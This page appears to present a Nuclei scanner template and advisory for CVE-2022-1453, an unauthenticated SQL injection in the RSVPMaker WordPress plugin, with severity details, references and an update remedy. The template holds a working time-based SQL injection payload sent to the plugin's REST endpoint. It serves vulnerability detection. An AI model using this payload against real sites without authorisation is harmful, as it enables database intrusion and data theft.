
RSVPMaker <= 9.2.5 - SQL Injection

CVE-2022-1453
Verified

Description

The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user-supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.

Severity

Critical

CVSS Score

9.8

Exploit Probability

62%

Published Date

February 22, 2026

Template Author

Shivam Kamboj

CVE-2022-1453.yaml
id: CVE-2022-1453

info:
  name: RSVPMaker <= 9.2.5 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.
  impact: |
    Attackers can retrieve sensitive data from the database without authentication, leading to data breach and privacy violations.
  remediation: |
    Update to version 9.2.6, or later
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rsvpmaker/rsvpmaker-925-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1453
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1453
    epss-score: 0.61558
    epss-percentile: 0.98348
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,rsvpmaker,vkev

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-json/rsvpmaker/v1/sked/1?post_id=(SELECT%209999%20FROM%20(SELECT(SLEEP(7)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 200'
          - 'regex("false$", body)'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a004730450221009ff8fab5e872a5dda56ca4e9d77f498439e5d76d4ae2ef3d3de2c0e1c56bedb402204e55b46592b1509cb287389bae3ab4b6382c55a52b9763d38e6d0c2c3bfb3259:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2022-1453
CWE ID:
CWE-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rsvpmaker/rsvpmaker-925-unauthenticated-sql-injection
https://nvd.nist.gov/vuln/detail/CVE-2022-1453

Remediation Steps

Update to version 9.2.6 or later.